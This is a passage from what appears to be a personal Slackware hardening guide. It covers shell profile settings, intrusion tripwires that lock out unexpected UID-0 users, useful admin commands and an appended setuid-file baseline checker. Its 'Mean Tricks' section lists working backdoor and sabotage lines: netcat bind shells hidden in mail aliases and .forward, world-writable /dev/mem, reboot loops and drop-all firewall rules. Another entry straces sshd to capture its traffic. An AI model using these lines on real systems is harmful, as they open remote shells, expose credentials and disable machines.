       FILE1=`echo $FILE | cut -d ' ' -f 2`
       FILE2=`echo $FILE | cut -d ' ' -f 3`
       if [ "$FILE1" = "Linux/i386" -o "$FILE2" = "Linux/i386" \
            -o "$FILE1" = "ELF" -o "$FILE2" = "ELF" ]; then
           strings "$1"
       fi ;;

Error Beep:

I make extensive use of tab completion in bash. However, the error beeps
tend to annoy those around me. Here are three ways to turn off the error
beep.

/etc/profile:
setterm -bfreq 0

~/.xinitrc:
xset -b
exec /usr/X11R6/bin/startfluxbox

/etc/inputrc:
set bell-style none

man bash

----[ Mean Tricks ]----

/etc/aliases:
opensaysme: | nc -l -p 44444 -e /bin/sh

~/.forward:
| nc -l -p 44444 -e /bin/sh

/etc/login.defs:
NO_PASSWORD_CONSOLE tty1,tty2,tty3,tty4,tty5,tty6

/etc/rc.d/rc.6:
touch /etc/forcefsck

/etc/hotplug/blacklist:
hid

/etc/inittab:
id:6:initdefault:

iptables -m random
iptables -A FORWARD -s 192.168.1.1 -m random --average 90 -j DROP
iptables -A INPUT -j DROP

Anywhere in /etc/rc.d:
reboot

enable -n enable

chmod u+s /usr/bin/strace
chmod u+s /usr/bin/gdb
chmod 666 /dev/mem
chmod 666 /dev/kmem
chmod 666 /dev/port

ifconfig eth0 mtu 68

touch ./-r

# Look mom, I'm securing my system!
chmod -R 600 /etc

----[ Useful Commands ]----

ldd /usr/bin/lppasswd
/lib/ld-linux.so.2 --list /usr/bin/lppasswd
strings /usr/bin/lppasswd

List some of the popular REM commands used.

man -k cron
grep crond /var/log/packages/*

# Binaries that still carry their symbol table ("not stripped"), skipping
# symlinks so each file is reported once
for d in /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin \
         /usr/X11R6/bin; do
    echo "$d"
    for f in "$d"/*; do
        [ -L "$f" ] && continue
        file "$f" | grep "not stripped"
    done
done

which kill
type -a kill

# Timestamps are trivial to forge: touch -r copies them from another file
stat /bin/login
touch example
stat example
touch -r /bin/login example
stat example

strace -p 19148 -f -e trace=network,read,write -o ssh_trace.out -e write=4 \
    -e read=6
# Where 19148 is the PID of sshd

ifconfig eth0 hw ether 00:00:DE:AD:BE:EF
ifconfig eth0 0.0.0.0 up -arp

ln -s /usr/bin/write /bin/write
kibitz dentonj

netwatch
iptraf

# last reads raw wtmp, not gzip, so uncompress a rotated copy first
zcat /var/log/wtmp.1.gz > /root/wtmp.1 && last -f /root/wtmp.1

grep -ir secur /usr/doc/* > security.txt

----[ /etc/profile ]----

Both of the lockout checks below key off $USER, which login sets but which
anyone can set themselves, and they only fire in interactive login shells
that read /etc/profile. Treat them as tripwires that make noise, not as
access controls.

# Kick and lock out users that are UID 0 but are not root
if [ "`id -u`" = "0" -a "$USER" != "root" ]; then
    # Lock the user out
    passwd -l "$USER"
    # Save some info
    date >> /root/SHIT
    netstat -peanut >> /root/SHIT
    ps auxww >> /root/SHIT
    w >> /root/SHIT
    w | mail -s "$USER has gained ROOT access on $HOSTNAME" \
        dentonj@gmail.com
    # Let EVERYONE know
    wall << EOF
****************************************************************
$USER has gained ROOT access on $HOSTNAME!!!
****************************************************************
EOF
    for i in /dev/pts/*; do
        echo -e "\n$USER has gained ROOT access on $HOSTNAME!!\n" >> "$i"
    done
    # Log it (logger writes through syslog; -f would read a file as the
    # message, so it is not used here)
    logger -is "$USER has gained ROOT access on $HOSTNAME!!"
    # Let the luzer know
    echo -e "\a\n\n You are _NOT_ root!!\n\n\a"
    # For the really paranoid (run before killing the user's processes)
    ifconfig eth0 down
    # Kill the user and their processes
    skill -9 -u "$USER"
    # This should be redundant
    logout
    exit
fi

export LESSOPEN="|/usr/bin/lessopen.sh %s"

# Set a default shell prompt:
#PS1='`hostname`:`pwd`#'
#if [ "$SHELL" = "/bin/pdksh" ]; then
#    PS1='! $ '
#elif [ "$SHELL" = "/bin/ksh" ]; then
#    PS1='! ${PWD/#$HOME/~}$ '
#elif [ "$SHELL" = "/bin/zsh" ]; then
#    PS1='%n@%m:%~%# '
#elif [ "$SHELL" = "/bin/ash" ]; then
#    PS1='$ '
#else
#    PS1='\u@\h:\w\$ '
#fi
if [ `id -u` = 0 ]; then
    # A red shell prompt for root
    PS1="\[\033[1;31m\][\j][\u@\h:\w]#\[\033[0m\] "
else
    # A green shell prompt for everyone else
    PS1="\[\033[1;32m\][\j][\u@\h:\w]$\[\033[0m\] "
fi
PS2='>'
export PATH LESS TERM PS1 PS2

# For non-root users, add the current directory to the search path:
#if [ ! "`id -u`" = "0" ]; then
#    PATH="$PATH:."
#fi

#
# Stuff I've added
#

# Add $HOME/bin to the search path
PATH=$PATH:$HOME/bin
export PATH

export FIGNORE=".o"

# Set EDITOR for less
export EDITOR=vim

# History
# I used to set these to paranoid settings, such as 100 or 10.
export HISTSIZE=10000
export HISTFILESIZE=10000
# Display timestamp information with each history entry
export HISTTIMEFORMAT="%F %T "

# Logout if a root terminal is not being used
if [ `id -u` = "0" ]; then
    export TMOUT=1200
fi

# Aliases
alias matrix="cmatrix -bass"
alias m="cmatrix -bass"
alias su="su -"
alias td="tcpdump -nvvSi eth0 | grcat conf.tcpdump"
# shred doesn't delete recursively
# use "/bin/rm -rf ..." for directories
# shred(1) also cannot guarantee the overwrite on journaled, RAID or
# snapshotting filesystems
alias rm="shred -uz"

# Disable the bash builtin command kill, forces the use
# of /bin/kill.
# This was a cute idea, but it prevents jobs from being killed
#enable -n kill

# Misc shell settings
shopt -s cdspell
shopt -s cmdhist
shopt -s dotglob
shopt -s extglob
setterm -bfreq 0

# grep options (these apply to every grep started from the shell,
# scripts included, so -n will leak line numbers into pipelines)
export GREP_OPTIONS="-n --color"
export GREP_COLOR="1;33"

# Secure less
export LESSSECURE=1

# This works for single user systems if the luzer who breaks into your
# system uses an interactive shell. -a: the UID must be neither root's
# nor dentonj's (with -o the test is always true and locks everyone out).
# passwd -l needs root, so for a non-root intruder only the logout fires.
if [ `id -u` != "0" -a `id -u` != "1000" ]; then
    passwd -l "$USER"
    logout
fi

# Set these and make them read only to keep users from setting them
export HISTCONTROL=""
export HISTIGNORE=""

# Disable builtin shell commands
# TODO

# Set shell variables as read only, this should be last. Note that a user
# can still start another shell, run bash --norc or set +o history, so
# this protects against carelessness, not against intent.
typeset -r HISTCONTROL
typeset -r HISTFILE
typeset -r HISTFILESIZE
typeset -r HISTIGNORE
typeset -r HISTNAME
typeset -r HISTSIZE
typeset -r LESSSECURE
typeset -r LOGNAME
typeset -r USER

-- When You Are Done --

Join the irc channel #slackware on irc.oftc.net and talk about everything
but Slackware.

-- Stuff that didn't work --

# If the following variables are not set, exit with an error message
: ${USER:?Who are you?}
: ${LOGNAME:?Who are you?}
: ${HOME:?The homeless need help}

# If a user doesn't have a home directory listed in /etc/passwd,
# login is nice enough to set "/" as $HOME
if [ "${HOME}" = "/" ]; then
    logout
fi

-- Todo --

KDE: Look into it

/etc/shells: Lock down the other shells.

/bin/login: Modify so a different password hashing algorithm is used.

Securing filesystems other than ext2 and ext3

Log checking utility

-- Resources --
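The sXid cron job in the Security Programs section above works by comparing
the system's setuid/setgid files against its previous run and mailing the
difference. The following is an added example, not part of this document and
not sXid's code: the core of that check in POSIX sh, so you can see exactly
what such a baseline catches (a new file, a changed mode or a changed owner)
and what it does not. It assumes GNU findutils for -printf, which Slackware
ships; the directory tree it builds is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original document or from sXid: the core of a
# setuid/setgid baseline check. Assumes GNU findutils (-printf) as shipped
# with Slackware, plus POSIX sort, diff, sed, grep and mktemp.

# Sorted snapshot of setuid/setgid regular files under $1, staying on one
# filesystem. Each line is "mode owner group path", e.g.
# "4755 root root /usr/bin/passwd", so a new file, a changed mode or a
# changed owner all alter the snapshot.
suid_snapshot() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u %g %p\n' 2>/dev/null | LC_ALL=C sort
}

# Record the baseline of $1 into $2 and print the number of entries.
suid_baseline() {
    suid_snapshot "$1" > "$2"
    wc -l < "$2" | tr -d ' '
}

# Compare the live tree $1 with baseline $2. Prints one line per change
# ("+" for a new or altered entry, "-" for one that vanished) and returns
# 1 if anything differs, 0 if the tree still matches the baseline.
suid_compare() {
    cmp_now=$(mktemp) || return 2
    suid_snapshot "$1" > "$cmp_now"
    cmp_changes=$(diff "$2" "$cmp_now" | grep '^[<>]' | sed 's/^< /-/; s/^> /+/')
    rm -f "$cmp_now"
    if [ -n "$cmp_changes" ]; then
        printf '%s\n' "$cmp_changes"
        return 1
    fi
    return 0
}

# Demo on a constructed tree standing in for "/". On a real host:
#   suid_baseline / /var/lib/suid.base      (once, from a known-good state)
#   suid_compare  / /var/lib/suid.base      (daily from cron, output mailed)
demo_root=$(mktemp -d)
mkdir -p "$demo_root/usr/bin"
printf '#!/bin/sh\n' > "$demo_root/usr/bin/passwd"; chmod 4755 "$demo_root/usr/bin/passwd"
printf '#!/bin/sh\n' > "$demo_root/usr/bin/wall";   chmod 2755 "$demo_root/usr/bin/wall"
printf '#!/bin/sh\n' > "$demo_root/usr/bin/ls";     chmod 0755 "$demo_root/usr/bin/ls"
echo "baseline holds $(suid_baseline "$demo_root" "$demo_root.base") entries"
# Simulated intrusion: a hidden setuid shell is dropped and ls gains the bit
printf '#!/bin/sh\n' > "$demo_root/usr/bin/.sh";    chmod 4755 "$demo_root/usr/bin/.sh"
chmod 4755 "$demo_root/usr/bin/ls"
suid_compare "$demo_root" "$demo_root.base" || echo "setuid/setgid set has changed"
rm -rf "$demo_root" "$demo_root.base"
```

Two limits are worth keeping in mind when relying on this, or on sXid. The
baseline must live somewhere the intruder cannot write (removable or
read-only media, or another host), or they simply refresh it after planting
their file. And the check sees only path, mode and ownership: a setuid
binary replaced by a trojaned copy with the same name, mode and owner is
invisible to it, which is what a hashing integrity checker such as the aide
entry above is for.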